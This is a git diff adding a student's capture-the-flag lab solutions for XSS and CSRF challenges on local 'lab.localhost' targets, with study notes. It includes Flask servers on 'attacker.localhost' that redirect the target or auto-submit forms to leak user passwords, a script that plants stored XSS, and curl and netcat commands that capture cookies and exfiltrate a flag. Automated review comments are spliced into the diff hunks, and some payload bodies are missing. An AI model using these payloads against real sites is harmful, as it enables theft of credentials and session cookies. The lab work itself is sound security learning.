diff --git a/5c/lab5c_3.py b/5c/lab5c_3.py
new file mode 100644
index 0000000..7a65221
--- /dev/null
+++ b/5c/lab5c_3.py
@@ -0,0 +1,9 @@
+from flask import Flask, redirect
+
+app = Flask("pwnc")
+
+@app.route("/")
+def hello():
+ return redirect("http://lab.localhost/showme")
+
+app.run("attacker.localhost", 9999)
diff --git a/5c/lab5c_4.py b/5c/lab5c_4.py
new file mode 100644
index 0000000..5882af2
--- /dev/null
+++ b/5c/lab5c_4.py
@@ -0,0 +1,20 @@
+from flask import Flask, render_template_string
+
+app = Flask("pwnc")
+
+
+@app.route("/")
+def hello():
+ # auto-submit on page load
+ html_form = """ + +
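Review bot: `app.run("attacker.localhost", 9999)` on the last line of lab5c_3.py (and likewise at the end of lab5c_4.py) executes at import time, so any `import` of the module — for instance to test `hello()` in isolation — blocks on starting a server as a side effect; put it under `if __name__ == "__main__":`. The bind target is given as a hostname rather than an address, so where the listener actually binds depends on how `attacker.localhost` resolves on the machine running it; a one-line comment stating the expected resolution would save the next reader a guess. `hello()` has no docstring; `"""Return a redirect to http://lab.localhost/showme."""` states what the one-liner is for.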
+ +
+ + +"""
+ return render_template_string(html_form)
+
+
+app.run("attacker.localhost", 9999)
diff --git a/5c/lab5c_6.py b/5c/lab5c_6.py
new file mode 100644
index 0000000..4507ac2
--- /dev/null
+++ b/5c/lab5c_6.py
@@ -0,0 +1,31 @@
+import requests
+
+echo_string = """ + +"""
+encode_1 = requests.utils.quote(echo_string)
+
+# store the XSS script in server
+middle_url = f"http://lab.localhost/addpost?ptext={encode_1}"
+encode_2 = requests.utils.quote(middle_url)
+
+final_url = f"http://lab.localhost/go?gourl={encode_2}"
+
+requests.get(final_url)
diff --git a/Dojo Notes.md b/Dojo Notes.md
index 2685a9f..9629347 100644
--- a/Dojo Notes.md
+++ b/Dojo Notes.md
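Review bot: The return value of `requests.get(final_url)` on the last line of lab5c_6.py is discarded and no timeout is passed, so the script neither reports whether the request was accepted nor bounds how long it can block; `response = requests.get(final_url, timeout=10)` followed by `response.raise_for_status()` makes both explicit. `requests.utils.quote` is `urllib.parse.quote` re-exported through requests' compat layer rather than a documented API; `from urllib.parse import quote` avoids depending on that. The two-stage encoding deserves a comment, e.g. `# quote twice: once for the ptext value, once more so the whole addpost URL survives as the gourl value`, since the intent is not obvious from the assignments alone. The body of `echo_string` does not survive in this rendering, so its content could not be reviewed.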
@@ -756,3 +756,62 @@ payload = input_str + padding + input_str_hash
- bruteforce to get canary
- buffer overflow, but again too small, so have to go for env var
- also similar stack pivot as we can't directly overwrite saved rip
+
+### lab 5c - xss/csrf
+
+- how to inject JS?
+ - URL-encoded - %xx
+ - event handlers - onload, onmouseover, etc.
+ - image tag with encoding (?)
+- CORS
+- XSS, CSP
+- CSRF, nonce
+
+### lab 5c.1 - alert me
+
+- simple XSS
+- regex validation, poorly done, only checks for `alert()`, can set `let a=alert;a()` or simply use some other dialog box
+- `curl http://lab.localhost/go?gourl='http://lab.localhost/echo?echo='`
+
+### lab 5c.2
+
+- even simpler?
+- leak endpoint provided...
+- `curl http://lab.localhost/go?gourl='http://lab.localhost/leak'`
+
+### lab 5c.3
+
+- CSRF token, given by program
+- but this time the `gourl` URL's hostname is restricted to `attacker.localhost`
+- then let's setup a flask server at this address and use it to redirect to the leak URL
+- `curl http://lab.localhost/go?gourl='http://attacker.localhost:9999/' -H "X-CSRF-Token: $(curl http://lab.localhost/get-csrf-token)"`
+
+### lab 5c.4
+
+- similar, instead of directly returning, it has an endpoint that puts passwords from `users` table into the `posts` table, which is publicly accessible
+- to trigger that, let's make a web server that returns a HTML form that auto-submits on page load, which hits that update endpoint
+- then make the challenge server go to it
+- `curl http://lab.localhost/go?gourl='http://attacker.localhost:9999/' -H "X-CSRF-Token: $(curl http://lab.localhost/get-csrf-token)"`
+- leaked, all that's left to do is view
+- `curl http://lab.localhost/view`
+
+### lab 5c.5
+
+- actly broken, `/profile` forgot to check for cookie
+- but let's see how it works
+
+- cookie but not a HTTP-only cookie
+- `nc -l 9999`
+- `curl http://lab.localhost/go?gourl='http://lab.localhost:9999'`
+- netcat server can see the cookie
+- use it in a request to `/profile`
+
+### lab 5c.6
+
+- stored XSS vuln
+- store the JS in the server
+- fetch that part from the server and the browser executes it
+- JS part:
+ - take flag from secret table and put it in public table
+ - get it and send it to a netcat server `nc lab.localhost -l 9999`
+- boom